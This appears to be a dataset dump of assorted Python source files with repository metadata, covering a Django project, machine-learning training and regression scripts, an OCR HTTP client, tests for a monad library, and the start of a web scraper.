] | permissive | fredpalmer/patt3rns | 926516c01ed69b2a48406d82578f670554fd8b8c | 3faac2b583d45c8bf9cc8fe9ad5b5009ee7ed538 | refs/heads/develop | 2021-01-01T16:49:23.990749 | 2015-09-28T16:05:26 | 2015-09-28T16:05:26 | 26,644,658 | 0 | 0 | null | 2015-09-28T16:05:26 | 2014-11-14T15:31:58 | Python | UTF-8 | Python | false | false | 156 | py | """
Utility helpers for organization module
"""
# coding=utf-8
from __future__ import unicode_literals
import logging
# Module-level logger, namespaced to this module's dotted import path.
logger = logging.getLogger(__name__)
| [
"fred.palmer@gmail.com"
] | fred.palmer@gmail.com |
ad43c4e662b812eeb2e0f193cfd48753329f760c | 456345882451054ec5c0841886746f0dfd858094 | /ProblemSet2/PS2-3.py | 21f963d00c0906b6ae3b6fdbb1279099353743d5 | [] | no_license | makthrow/6.00x | faf5241008b1b57760a2e3411bf7fe637488a8fd | 7480be3634f5442c05bc9c838ab90ca80cd57ecc | refs/heads/master | 2021-01-10T21:49:31.302625 | 2013-05-21T18:04:14 | 2013-05-21T18:04:14 | 10,201,987 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,660 | py | """
Monthly interest rate = (Annual interest rate) / 12
Monthly payment lower bound = Balance / 12
Monthly payment upper bound = (Balance x (1 + Monthly interest rate)^12) / 12
"""
#Test Case 1:
balance = 320000
annualInterestRate = 0.2
# Lowest Payment: 29157.09
# Derived bounds for the bisection search.
# NOTE(review): this file uses Python 2 print syntax below, so
# ``balance / 12`` is integer floor division here.
monthlyInterestRate = annualInterestRate / 12
lowerBound = balance / 12
upperBound = (balance * (1 + monthlyInterestRate) ** 12) / 12
updatedBalance = balance
def remainingBalance(fixedMonthlyPayment):
    """Balance left after 12 equal monthly payments with monthly compounding.

    Reads the module globals ``balance`` and ``monthlyInterestRate``; each
    month the payment is deducted and the remainder accrues one month of
    interest.
    """
    remaining = balance
    for _ in range(12):
        remaining = (remaining - fixedMonthlyPayment) * (1 + monthlyInterestRate)
    return remaining
def balancePaidInFull(updatedBalance):
    """True once the running balance has been driven to zero or below."""
    return not (updatedBalance > 0)
def binarySortToLowerBound():
    """Bisect between the global lower/upper bounds for the fixed payment.

    Mutates the module-level ``lowerBound``/``upperBound`` and returns the
    converged lower bound (or the exact payment if the year-end balance
    hits zero precisely).
    """
    global lowerBound
    global upperBound
    epsilon = 0.01
    while abs(upperBound - lowerBound) > epsilon:
        fixedMonthlyPayment = (lowerBound + upperBound) / 2
        updatedBalance = remainingBalance(fixedMonthlyPayment)
        if updatedBalance == 0:
            return fixedMonthlyPayment
        if updatedBalance > 0:
            # Payment too small: balance still positive after 12 months.
            lowerBound = fixedMonthlyPayment
        else:
            upperBound = fixedMonthlyPayment
        print (upperBound - fixedMonthlyPayment)
    print "lowerBound: %f" % lowerBound
    return lowerBound
fixedMonthlyPayment = binarySortToLowerBound()
# Nudge the bisection result up in 1-cent steps until the balance clears.
while not balancePaidInFull(updatedBalance):
    fixedMonthlyPayment += 0.01
    updatedBalance = remainingBalance(fixedMonthlyPayment)
#print updatedBalance
#print remainingBalance(29157.09)
print "Lowest Payment: %.2f" % fixedMonthlyPayment
| [
"alanjaw@gmail.com"
] | alanjaw@gmail.com |
f679cfe49a5a9682024f0cc2f559fdb8e4f7a420 | d76f864ec1ddc0ad40461b2c7283caac113d1a94 | /borrowers/manage.py | 7dc3700feea2035b1da3ec350ff7d0faee9ed167 | [] | no_license | ecarlos09/roselyn-elwin-library-2 | 13b0b60fecc8bd6722b70f775b62648a0dc8753a | 3e64c298aa42827cf0ba7b6d2a20884efb19e405 | refs/heads/main | 2023-04-19T21:38:04.061450 | 2021-05-09T11:31:37 | 2021-05-09T11:31:37 | 365,148,235 | 0 | 1 | null | 2021-05-09T11:09:15 | 2021-05-07T07:18:57 | Python | UTF-8 | Python | false | false | 665 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Run administrative tasks."""
    # Matches the stock Django ``manage.py`` template: point Django at this
    # project's settings module, then hand argv to the management command
    # dispatcher. Kept byte-identical to the generated boilerplate.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'borrowers.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| [
"elwin.carlos09@gmail.com"
] | elwin.carlos09@gmail.com |
faa46e3e7481d5bbafc9aef63a7b6099bf197c4b | cd5cbfb88794c10490e70ca5a06915cd351db6f9 | /train.py | 471dcbaf815d14ef26eaa181965336897abf4ff8 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | TrendingTechnology/conditional-style-transfer | 813d1b57a804dc621da30e6bb3a5e82875eb9354 | fcdc4716f98e333ef19f9d45be880d0837151cd2 | refs/heads/master | 2022-12-18T10:57:00.258679 | 2020-09-29T09:20:55 | 2020-09-29T09:20:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | import time
from options.train_options import TrainOptions
from data import CreateDataLoader, CreateStyleDataLoader
from models import create_model
from util.visualizer import Visualizer
import torch
if __name__ == '__main__':
    # Parse CLI options, build the data loader / model / visualizer, then
    # run the training loop.
    opt = TrainOptions().parse()
    data_loader = CreateDataLoader(opt)
    dataset = data_loader.load_data()
    dataset_size = len(data_loader)
    print('#training images = %d' % dataset_size)
    model = create_model(opt)
    model.setup(opt)
    visualizer = Visualizer(opt)
    total_steps = 0
    #torch.autograd.set_detect_anomaly(True)
    # opt.niter + opt.niter_decay epochs in total (the latter presumably run
    # with a decayed learning rate — see model.update_learning_rate below).
    for epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):
        epoch_start_time = time.time()
        iter_data_time = time.time()
        epoch_iter = 0
        for i, data in enumerate(dataset):
            iter_start_time = time.time()
            if total_steps % opt.print_freq == 0:
                # Time spent waiting on data loading since the last iteration.
                t_data = iter_start_time - iter_data_time
            visualizer.reset()
            total_steps += opt.batch_size
            epoch_iter += opt.batch_size
            # Get next style samples and add them to the data
            # (merge each style tensor's first two dims into one leading
            # batch dimension before feeding the model).
            data['A_style'] = torch.reshape(data['A_style'], [data['A_style'].shape[0] * data['A_style'].shape[1], data['A_style'].shape[2], data['A_style'].shape[3], data['A_style'].shape[4]])
            data['B_style'] = torch.reshape(data['B_style'], [data['B_style'].shape[0] * data['B_style'].shape[1], data['B_style'].shape[2], data['B_style'].shape[3], data['B_style'].shape[4]])
            data['C_style'] = torch.reshape(data['C_style'], [data['C_style'].shape[0] * data['C_style'].shape[1], data['C_style'].shape[2], data['C_style'].shape[3], data['C_style'].shape[4]])
            model.set_input(data)
            model.optimize_parameters()
            if total_steps % opt.display_freq == 0:
                save_result = total_steps % opt.update_html_freq == 0
                visualizer.display_current_results(model.get_current_visuals(), epoch, save_result)
            if total_steps % opt.print_freq == 0:
                losses = model.get_current_losses()
                t = (time.time() - iter_start_time) / opt.batch_size
                visualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)
                if opt.display_id > 0:
                    visualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)
            if total_steps % opt.save_latest_freq == 0:
                print('saving the latest model (epoch %d, total_steps %d)' %
                      (epoch, total_steps))
                model.save_networks('latest')
            iter_data_time = time.time()
        # Periodic epoch checkpoint in addition to the rolling 'latest' one.
        if epoch % opt.save_epoch_freq == 0:
            print('saving the model at the end of epoch %d, iters %d' %
                  (epoch, total_steps))
            model.save_networks('latest')
            model.save_networks(epoch)
        print('End of epoch %d / %d \t Time Taken: %d sec' %
              (epoch, opt.niter + opt.niter_decay, time.time() - epoch_start_time))
        model.update_learning_rate()
| [
"vojtech@nnaisense.com"
] | vojtech@nnaisense.com |
c7256ce38afd60cd7ed3c1b4dd80ff0d00783c55 | 65e3c1f2911de516bd89e68ba1da5a73bd70d16c | /Matplotlib/pyplot_tutorial_4.py | df09e2ac45af7bf54d3704d0aaaccd65242b4596 | [] | no_license | PiotrKrolak/Python | 174a78e3aab08d6c77386a26b89d817018b82ef5 | 79589e8919049f35fe33ad93f0293eff8000b02d | refs/heads/master | 2020-04-04T08:03:02.476313 | 2019-04-19T18:02:31 | 2019-04-19T18:02:31 | 155,769,402 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | #
# https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py
import matplotlib.pyplot as plt
import numpy as np
def f(t):
    """Exponentially damped cosine: exp(-t) * cos(2*pi*t)."""
    decay = np.exp(-t)
    oscillation = np.cos(2 * np.pi * t)
    return decay * oscillation
# Sample the damped cosine on a coarse grid (markers) and a fine grid (line),
# then plot it above the undamped cosine in a two-row figure.
t1 = np.arange(0.0, 5.0, 0.1)
t2 = np.arange(0.0, 5.0, 0.02)
plt.figure(1)
plt.subplot(211)
plt.plot(t1, f(t1), 'bo', t2, f(t2), 'k')
plt.subplot(212)
plt.plot(t2, np.cos(2*np.pi*t2), 'r--')
plt.show()
| [
"krolak.piotr.lca@gmail.com"
] | krolak.piotr.lca@gmail.com |
5193b894f4cc698c3ac930f9f72b1f317437c348 | b1fe8054a20170b0484411eb2eae19ba820f2f77 | /nolsatu_courses/api/serializers.py | a1f903884ff09e5778efa897f3fccd91e3dfd70c | [] | no_license | nolsatuid/courses | 2d9be4ffac2651d63b8bb981b3280915109b6996 | df335cd7e8f3d08a44c4d0ce06f4989a89215189 | refs/heads/master | 2022-11-23T03:43:11.145131 | 2021-02-24T06:12:11 | 2021-02-24T06:12:11 | 145,433,826 | 0 | 1 | null | 2022-11-22T02:42:32 | 2018-08-20T15:12:03 | JavaScript | UTF-8 | Python | false | false | 350 | py | from rest_framework import serializers
class MessageSuccesSerializer(serializers.Serializer):
    """Serializer for a plain success payload with a single ``message`` field.

    NOTE(review): "Succes" is misspelled, but renaming the class would
    break existing importers, so the name is left as-is.
    """
    message = serializers.CharField()
class ErrorMessageSerializer(serializers.Serializer):
    """Serializer for an error payload: detail, error_message, message and
    error_code, all plain strings."""
    detail = serializers.CharField()
    error_message = serializers.CharField()
    message = serializers.CharField()
    error_code = serializers.CharField()
| [
"irfan.pule2@gmail.com"
] | irfan.pule2@gmail.com |
287cfa5fca38192f022c1fdc9fd06ba73ef730a3 | 162e936cdbc362a18fa16e1d9579e8937671a13c | /dataMerge.py | 12b1b9bd95932866e6d1543e81fd4ff4e94f336c | [] | no_license | samanwayadas-creator/RNNnetworkRepo | 6b8c2ec2b3355c1fd52af1c79f5aeab3f31856f3 | 459bb79c41789030d989715ba1efd5ff7040cd59 | refs/heads/main | 2023-04-30T09:53:50.283073 | 2021-05-12T10:41:14 | 2021-05-12T10:41:14 | 366,680,535 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,126 | py | import glob as glob
import os
import numpy as np
from matplotlib import pyplot as plt
# from sklearn.gaussian_process import GaussianProcessRegressor
# from sklearn.gaussian_process.kernels import RBF, WhiteKernel, ConstantKernel as C
np.random.seed(1)
import pdb
import sys
import _pickle as pickle
if '/scratch/wz1219/FoV/' not in sys.path:
    sys.path.insert(0, '/scratch/wz1219/FoV/')
from mycode.config import cfg
import math
# Load the two experiment pickles (the 2018 dataset2 merge is disabled below).
dataset1_exp1 = pickle.load(open('/scratch/wz1219/FoV/data/exp_1_xyz.p','rb'))
dataset1_exp2 = pickle.load(open('/scratch/wz1219/FoV/data/exp_2_xyz.p','rb'))
#dataset2 = pickle.load(open('/scratch/wz1219/FoV/data/video_data_2018.p','rb'))
new_dataset = {}
video_num1 = 9
tester_num1 = 48
video_num2 = 19
tester_num2 = 57
video_num_new = 37
# Re-key exp_1 videos to 0..8 and exp_2 videos to 9..17 in the merged dict.
for video_ind in range(video_num1):
    new_dataset[video_ind] = dataset1_exp1[video_ind]
for video_ind in range(video_num1):
    new_dataset[video_ind+9] = dataset1_exp2[video_ind]
#for video_ind in range(video_num2):
#    new_dataset[video_ind+18] = dataset2[video_ind]
pickle.dump(new_dataset,open('./data/tsinghua_merged_dataset.p','wb'))
| [
"75118243+samanwayadas-creator@users.noreply.github.com"
] | 75118243+samanwayadas-creator@users.noreply.github.com |
5a8809be90a32d25e83f3c8153b214a58ded97ae | 1944daa9a22b689fcdb7315a11aae4fc0b32a398 | /ctc/client.py | e6ddb1da72351cc7608dba4b30f34a36702483a0 | [] | no_license | fireae/OCR-methods-with-ctc-attention-and-transformer- | 1a90e04a4b879bda292dd553de53d27aa288d0f2 | 15dfd4cc23415533ddb76c29ec0c5d2f22f3646e | refs/heads/master | 2022-12-05T09:36:38.557132 | 2020-06-29T12:35:26 | 2020-06-29T12:35:26 | 299,661,567 | 1 | 0 | null | 2020-09-29T15:37:49 | 2020-09-29T15:37:48 | null | UTF-8 | Python | false | false | 3,943 | py | # -*- coding: utf-8 -*-
import sys, cv2
import requests
import urllib
import json
import time
import os
import glob
import re
import base64
import numpy
ft_path = '/data/notebooks/yuandaxing1/ft_lib/'
sys.path.append(ft_path)
import ft2
batch_size = 1
class SHOCR(object):
def __init__(self, server="gpu3ss.jx.shbt.qihoo.net", detection_port=9000, recongition_port=18866):
self.server = server
self.detection_port = detection_port
self.recongition_port = recongition_port
self.detect_url, self.reco_url = [
'http://%s:%d' % (self.server, self.detection_port),
'http://%s:%d' % (self.server, self.recongition_port),
]
def ocr(self, image_list):
'''
image list is opencv image list
'''
params = {'images' : []}
for idx, cur_image in enumerate(image_list):
params['images'].append({'name' : '%d.jpg' %(idx) ,
'content' : base64.b64encode(cv2.imencode('.png', cur_image)[1])})
beg = time.time()
rects = requests.post(self.detect_url, data = json.dumps(params), headers = {'content-type': 'application/json'}).json()
image_slice = []
for r, cur_image in zip(rects['result'], image_list):
for idx, b in enumerate(r['rect']):
sl = cur_image[ b[1]:b[3], b[0]:b[2]]
data = base64.b64encode(cv2.imencode('.jpg', sl)[1])
image_slice.append({'name' : 'slice%d.jpg' % (idx),
'content': data})
reg = requests.post(self.reco_url, data = json.dumps({'images' : image_slice}), headers = {'content-type': 'application/json'}).json()
reg_result, idx = reg['result'], 0
for r in rects['result']:
for box in r['rect']:
box.extend(reg_result[idx]['text'])
idx+=1
return rects
def Run(self, input_dir, output_dir):
if (not os.path.exists(output_dir)):
os.makedirs(output_dir)
self.ft = ft2.put_chinese_text(os.path.join(ft_path, 'msyh.ttf'))
image_list = glob.glob(os.path.join(input_dir, "*.jpg"))
for start in range(0, len(image_list), batch_size):
try:
cur_image_list = image_list[start :min(start+batch_size, len(image_list))]
l = [cv2.imread(image) for image in cur_image_list]
start = time.time()
ocr_result = self.ocr(l)
print('cost', (time.time() - start))
for image, result, name in zip(l, ocr_result['result'], cur_image_list):
cur_image = numpy.zeros(image.shape)
print(result['rect'])
for rect in result['rect']:
if not rect[5]: continue
cur_image = cv2.rectangle(cur_image,tuple(rect[0:2]), tuple(rect[2:4]),(0,255,0),1)
cur_image = self.ft.draw_text(cur_image, rect[0:2], rect[5], 15, (0, 255, 0))
new_name = os.path.join(output_dir, os.path.splitext(os.path.basename(name))[0]+"_debug.jpg")
cur_image = numpy.hstack((image, cur_image))
cv2.imwrite(new_name, cur_image)
json_name = os.path.splitext(new_name)[0]+".json"
f = open(json_name, "wb")
json.dump(ocr_result['result'], f)
f.close()
except Exception as e:
print(e)
if __name__ == "__main__":
ocr = SHOCR()
#ocr.Run('/data/notebooks/yuandaxing1/OCR/ocr_src', '/data/notebooks/yuandaxing1/OCR/ocr_src_test')
ocr.Run('/data/notebooks/yuandaxing1/OCR/text-detection-ctpn-master/testing/0608','/data/notebooks/yuandaxing1/OCR/text-detection-ctpn-master/testing/0608_test_result/')
#ocr.Run('/data/notebooks/yuandaxing1/OCR/CNN_LSTM_CTC_Tensorflow/test', './test')
| [
"shaunzhuyw@sina.com"
] | shaunzhuyw@sina.com |
ebb6925a2298d6d5c71e53537d3d15ee1d015735 | ff2e084d1bb347d16955fbdaa8e9f9d95bcb03e7 | /onepanel/core/api/models/token_wrapper.py | 4f86e905f13a1cff531909e013446e409db807b5 | [] | no_license | casualuser/python-sdk | 7db8969e93693c27fb7f7349cd8353ede54d2ed4 | 9d35ab476a9ba701a09d305bf5ae5af4ba9ed5a6 | refs/heads/master | 2022-09-15T15:18:39.672855 | 2020-05-25T22:15:22 | 2020-05-25T22:15:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,209 | py | # coding: utf-8
"""
Onepanel Core
Onepanel Core project API # noqa: E501
The version of the OpenAPI document: 1.0.0-beta1
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from onepanel.core.api.configuration import Configuration
class TokenWrapper(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'token': 'str'
}
attribute_map = {
'token': 'token'
}
def __init__(self, token=None, local_vars_configuration=None): # noqa: E501
"""TokenWrapper - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._token = None
self.discriminator = None
if token is not None:
self.token = token
@property
def token(self):
"""Gets the token of this TokenWrapper. # noqa: E501
:return: The token of this TokenWrapper. # noqa: E501
:rtype: str
"""
return self._token
@token.setter
def token(self, token):
"""Sets the token of this TokenWrapper.
:param token: The token of this TokenWrapper. # noqa: E501
:type: str
"""
self._token = token
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TokenWrapper):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, TokenWrapper):
return True
return self.to_dict() != other.to_dict()
| [
"r@onepanel.io"
] | r@onepanel.io |
01c6727bbb55b58aaaf00926f80a814bb05f0768 | b854e106dbde2f83cbf07918b740bc21b5a37d16 | /SVR/main.py | 6adbba966a857b375687a72db6a0f364bd0f2518 | [] | no_license | hubertmucha/Machine | 772f4e37510dfda0b661ad41f56a1d0dfefd706b | 5240576af196c740dbd97ec70bac49fb49759d65 | refs/heads/master | 2022-04-11T15:35:47.408963 | 2020-04-11T11:10:41 | 2020-04-11T11:10:41 | 254,343,294 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 790 | py | import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
#importing the data set
dataset = pd.read_csv('Position_Salaries.csv')
X = dataset.iloc[:,1:2].values #matrix
y = dataset.iloc[:,2].values #vector
#scaling data
from sklearn.preprocessing import StandardScaler
sc_X = StandardScaler()
sc_y = StandardScaler()
X = sc_X.fit_transform(X)
y = sc_y.fit_transform(y.reshape(-1, 1))
#SVR
from sklearn.svm import SVR
regressorSVR = SVR(kernel='rbf')
regressorSVR.fit(X, y)
#y_pred =regressorSVR.predict([[6.5]])
#visualisation SVR regression
plt.scatter(X,y, color='blue')
plt.plot(X,regressorSVR.predict(X),color='green')
plt.title('Linear Regresion')
plt.show()
y_pred = regressorSVR.predict(sc_X.transform(np.array([[6.5]])))
y_pred = sc_y.inverse_transform(y_pred)
| [
"58261346+hubertmucha@users.noreply.github.com"
] | 58261346+hubertmucha@users.noreply.github.com |
b54170de518ce19a097475f091966db1fd82f864 | fd8e46371be27b51ef345dd8ee5a38cdcd2dfe49 | /tests/test_simplad_monad.py | adec7766ec627ac2755c10c21ca1ed4064860c04 | [
"MIT"
] | permissive | Cogmob/simplads | 1c029ba5474625cd20db46c5e28c194c97e0089d | 8731c4a02273109187cfe601058ce797e32ba1ae | refs/heads/master | 2020-12-28T04:32:56.982748 | 2016-11-04T17:36:51 | 2016-11-04T17:36:51 | 68,810,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,231 | py | from simplads.simplad_monad.simplad_base_helper import Bound
from compare import expect
from fn import F
from functools import partial
from nose.plugins.attrib import attr
from simplads.simplad_monad.namedtuples.bind_args import BindArgs
from simplads.simplad_monad.simplad_base_helper import WrappedDelta, Bound
from simplads.simplad_monad.simplad_monad import (
DeltaType,
SimpladMonad as SM,
SimpladResult)
from simplads.simplads.list_simplad import ListSimplad
from simplads.simplads.log_simplad import LogSimplad
from simplads.simplads.maybe_simplad import MaybeSimplad as MS, MaybeType
import unittest
def get_echo(i):
def f(j):
return i
return f
def echo(i):
return i
def add_delta_map(i):
return SimpladResult(value=i, delta_map={})
def add_customs(i):
return i, {}
class TestSimpladMonad(unittest.TestCase):
def test_fm(self):
func = SM.get_four()
expect(func).to_equal(4)
def test_unit_maybe(self):
add_simplads = SM.add_simplads({
's1': MS(),
's2': MS(),
's3': MS(),
's4': MS() })
order = SM.set_simplad_order(['s1','s2','s3','s4'])
sm = (F() >> add_simplads >> order)(SM.make())
res = SM.unit(sm)(4)
expect(res).to_equal(((((4, MaybeType.has_value), MaybeType.has_value),
MaybeType.has_value), MaybeType.has_value))
def test_unit_list(self):
add_simplads = SM.add_simplads({
'm1': MS(),
's1': ListSimplad(),
's2': ListSimplad(),
's3': ListSimplad(),
's4': ListSimplad(), })
order = SM.set_simplad_order(['s1','s2','s3','s4','m1'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[[[1,2]],[[1]]],[[[4]]]]
res = SM.unit(sm)(val)
expect(res).to_equal(
([([([([(1, MaybeType.has_value), (2, MaybeType.has_value)],
None)], None), ([([(1, MaybeType.has_value)], None)], None)],
None), ([([([(4, MaybeType.has_value)], None)], None)], None)],
None))
#@attr('s')
def test_box_four(a):
add_simplads = SM.add_simplads({
's1': ListSimplad(),
's2': ListSimplad(),
's3': ListSimplad(),
's4': ListSimplad()})
order = SM.set_simplad_order(['s4','s3','s2','s1'])
sm = (F() >> add_simplads >> order)(SM.make())
boxed = SM.get_box(sm)(lambda x: x)(
BindArgs(bound=SimpladResult(val=8,
delta_map={'s2': MaybeType.no_value}), deltas=[]))
expect(boxed).to_equal(
BindArgs(bound=8, deltas=[
WrappedDelta(type=DeltaType.default, delta=None),
WrappedDelta(type=DeltaType.configured,
delta=MaybeType.no_value),
WrappedDelta(type=DeltaType.default, delta=None),
WrappedDelta(type=DeltaType.default, delta=None)]))
def test_bind_maybe(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': MS(),
'4': MS(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = 4
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=Bound(unbound=Bound(unbound=Bound(unbound=Bound(
unbound=512,
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value))
def test_bind_list(self):
add_simplads = SM.add_simplads({
'1': ListSimplad(),
'2': ListSimplad(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': ListSimplad()})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[[[[4]]]]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=[Bound(unbound=[Bound(unbound=[Bound(unbound=[Bound(
unbound=[512],
annotation=None)],
annotation=None)],
annotation=None)],
annotation=None)],
annotation=None))
def test_bind_mixed(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[4]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(
Bound(unbound=Bound(unbound=Bound(unbound=[Bound(unbound=[Bound(
unbound=512,
annotation=MaybeType.has_value)],
annotation=None)],
annotation=None),
annotation=MaybeType.has_value),
annotation=MaybeType.has_value))
def test_bind_with_fail(self):
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': ListSimplad(),
'4': ListSimplad(),
'5': MS()
})
order = SM.set_simplad_order(['1','2','3','4','5'])
sm = (F() >> add_simplads >> order)(SM.make())
val = [[4]]
bound = SM.unit(sm)(val)
def double_simplad_result(i):
return SimpladResult(val=i*2, delta_map={})
def double_simplad_result_fail_2(i):
return SimpladResult(val=i*2, delta_map={
'5': MaybeType.no_value
})
bound = SM.bind(double_simplad_result)(
(sm, BindArgs(bound=bound, deltas=[])))
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result_fail_2)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
bound = SM.bind(double_simplad_result)(bound)
expect(bound[1].bound).to_equal(Bound(unbound=None,
annotation=MaybeType.no_value))
# def test_bind_with_fail(self):
# add_simplads = SM.add_simplads({
# 's1': MS(),
# 's2': MS(),
# 's3': MS(),
# 's4': MS(),
# 's5': MS(),
# 's6': MS(),
# 's7': MS()
# })
# order = SM.set_simplad_order(['s7','s6','s5','s4','s3','s2','s1'])
#
# sm = (F() >> add_simplads >> order)(SM.make())
#
# unit = SM.unit(sm)
# bind = SM.bind(
# func = get_echo(Bound(unbound=8,
# annotation={'s2':MaybeType.no_value})))
#
# result = (F() >> unit >> add_deltas >> bind >> bind >> bind)(4)
# expect(result).to_equal(
# BindArgs(Bound(
# unbound=Bound(unbound=None, annotation=MaybeType.no_value),
# annotation=MaybeType.has_value), deltas=[]))
def test_pushing_simplad(self):
add_maybe = SM.push_simplad(simplad=MS())
add_log = SM.push_simplad(simplad=LogSimplad())
sm1 = (F() >> add_maybe >> add_maybe >> add_log)(SM.make())
add_simplads = SM.add_simplads({
'1': MS(),
'2': MS(),
'3': LogSimplad(),
})
order = SM.set_simplad_order(['1','2','3'])
sm2 = (F() >> add_simplads >> order)(SM.make())
expect(SM.unit(sm1)(4)).to_equal(SM.unit(sm2)(4))
# @attr('s')
# def test_pushing_simplad_bind(self):
# add_maybe = SM.push_simplad(simplad=MS())
# add_log = SM.push_simplad(simplad=LogSimplad())
# sm1 = (F() >> add_maybe >> add_maybe >> add_log)(SM.make())
#
# def box(sm):
# def f(i):
# return (sm, BindArgs(bound=i, deltas=[]))
# return f
#
# add_simplads = SM.add_simplads({
# '1': MS(),
# '2': MS(),
# '3': LogSimplad(),
# })
# order = SM.set_simplad_order(['1','2','3'])
# sm2 = (F() >> add_simplads >> order)(SM.make())
#
# bind1 = SM.bind(func = add_customs)
# bind2 = SM.bind(func = add_customs)
#
# binds1 = (F() >> SM.unit(sm1) >> box(sm1) >> bind1 >> bind1)(4)
# binds2 = (F() >> SM.unit(sm2) >> box(sm2) >> add_simplads >> bind2 >> bind2)(4)
#
# expect(binds1).to_equal(binds2)
| [
"luke.avery@live.co.uk"
] | luke.avery@live.co.uk |
73ad191df8f81ff1d0c4174bf2af5a3353083aa8 | 5068fd40502a09f3ba7d34de7e60b0d1e48a5f9e | /amazon.py | 0485295f776964f48e1696b85ec401125bbae1fc | [] | no_license | ishvaram/Python-connectors | 3fbb9246b443d4fc7bdc53256f5f8f7ab8d34f86 | 66079d1d0b80a06fe20beda9b9a475c07be4cf88 | refs/heads/master | 2021-01-18T23:59:47.447494 | 2017-11-27T07:24:40 | 2017-11-27T07:24:40 | 47,703,004 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,646 | py | import sys
import requests
import urllib2
import itertools
from bs4 import BeautifulSoup
pageNumber = 1
max_number = 133
opener = urllib2.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
for number in range(pageNumber, max_number + pageNumber):
